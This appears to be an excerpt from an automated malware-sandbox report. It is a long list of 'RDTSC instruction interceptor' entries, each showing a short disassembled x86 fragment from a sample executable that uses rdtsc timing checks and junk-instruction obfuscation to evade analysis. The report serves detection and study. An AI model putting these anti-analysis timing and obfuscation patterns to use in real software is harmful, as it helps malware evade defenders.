                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8A3FD second address: B8A460 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FB3DD3D95E8h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FB3DD3D95E8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 push 00000000h 0x00000032 cld 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 mov ebx, 75241CFBh 0x0000003b jo 00007FB3DD3D95ECh 0x00000041 mov dword ptr [ebp+122D384Dh], edi 0x00000047 popad 0x00000048 sbb si, B283h 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB3DD3D95ECh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8919F second address: B891A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B891A6 second address: B891AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D014 second address: B8D01A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D01A second address: B8D090 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2B3Eh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FB3DD3D95E8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FB3DD3D95E8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jmp 00007FB3DD3D95F2h 0x0000004c jnc 00007FB3DD3D95E8h 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 pop edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8D090 second address: B8D09A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8C7 second address: B8B8E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8C34C second address: B8C350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8CE0E second address: B8CE26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8E2 second address: B8B8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8E8 second address: B8B8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9198D second address: B91991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B8F4 second address: B8B906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B8B906 second address: B8B90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E4E second address: B92E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92140 second address: B92145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E52 second address: B92E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B92E56 second address: B92E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B93FE9 second address: B94007 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB3DD3D95ECh 0x0000000c jc 00007FB3DD3D95E6h 0x00000012 popad 0x00000013 push eax 0x00000014 jp 00007FB3DD3D960Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B94007 second address: B9400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95024 second address: B9502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9502D second address: B95031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95031 second address: B95035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95035 second address: B9504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB3DD280BBCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942BA second address: B942C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942C0 second address: B942E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FB3DD280BB6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B942E5 second address: B94300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95275 second address: B95279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B95279 second address: B9527F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9527F second address: B95289 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B991CA second address: B991CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B991CE second address: B991E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9845B second address: B98465 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD3D95ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B72E second address: B9B735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C75A second address: B9C760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C760 second address: B9C764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C764 second address: B9C773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C773 second address: B9C777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9C777 second address: B9C77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9E892 second address: B9E896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9E896 second address: B9E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007FB3DD3D95EEh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BA1B64 second address: BA1B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B842 second address: B9B84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9B84C second address: B9B850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B9FC2F second address: B9FC39 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB3DD3D95E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BA33E4 second address: BA3487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FB3DD280BB6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FB3DD280BBDh 0x00000016 mov edi, ecx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov di, DCBDh 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jbe 00007FB3DD280BBCh 0x00000030 or dword ptr [ebp+122D2618h], edx 0x00000036 mov ebx, 28D28FA6h 0x0000003b mov eax, dword ptr [ebp+122D07E9h] 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007FB3DD280BB8h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b sub dword ptr [ebp+122D3770h], ecx 0x00000061 push FFFFFFFFh 0x00000063 push 00000000h 0x00000065 push esi 0x00000066 call 00007FB3DD280BB8h 0x0000006b pop esi 0x0000006c mov dword ptr [esp+04h], esi 0x00000070 add dword ptr [esp+04h], 0000001Ch 0x00000078 inc esi 0x00000079 push esi 0x0000007a ret 0x0000007b pop esi 0x0000007c ret 0x0000007d push eax 0x0000007e jc 00007FB3DD280BC2h 0x00000084 jp 00007FB3DD280BBCh 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9BE second address: B4C9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9C2 second address: B4C9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4C9DF second address: B4CA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007FB3DD3D95F8h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAAB65 second address: BAAB91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB3DD280BBCh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FB3DD280BCBh 0x00000015 jmp 00007FB3DD280BBBh 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE58 second address: B3BE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE5E second address: B3BE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B3BE63 second address: B3BE72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FB3DD3D95E6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFDC3 second address: BAFDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF51 second address: BAFF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF55 second address: BAFF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF59 second address: BAFF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF65 second address: BAFF7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f js 00007FB3DD280BB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF7C second address: BAFF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BAFF85 second address: BAFF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5000 second address: BB5004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5004 second address: BB5008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5008 second address: BB500E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB51A7 second address: BB521E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jg 00007FB3DD280BC9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FB3DD280BC4h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push ebx 0x0000001e jmp 00007FB3DD280BC8h 0x00000023 pop ebx 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d js 00007FB3DD280BC0h 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BB5301 second address: BB5306 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B49550 second address: B4955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4955C second address: B49561 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAA57 second address: BBAA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BBAA6C second address: BBAA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FB3DD3D95E6h 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f push ebx 0x00000010 ja 00007FB3DD3D95E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1E43 second address: BE1E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3DD280BBAh 0x00000010 push eax 0x00000011 jl 00007FB3DD280BB6h 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1E74 second address: BE1E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE1FD5 second address: BE1FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2401 second address: BE240C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE240C second address: BE2439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3DD280BC5h 0x00000009 jmp 00007FB3DD280BC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2584 second address: BE2588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2588 second address: BE259F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB3DD280BB8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jng 00007FB3DD280BB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE2EE6 second address: BE2F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007FB3DD3D95F3h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6294 second address: BE6299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6299 second address: BE62DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FB3DD3D95E8h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB3DD3D95F2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE62DB second address: BE62DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE62DF second address: BE62E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE6436 second address: BE6440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE658D second address: BE6599 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007FB3DD3D95E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66C2 second address: BE66CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66CD second address: BE66D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66D2 second address: BE66D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BE66D8 second address: BE66EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB3DD3D95E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
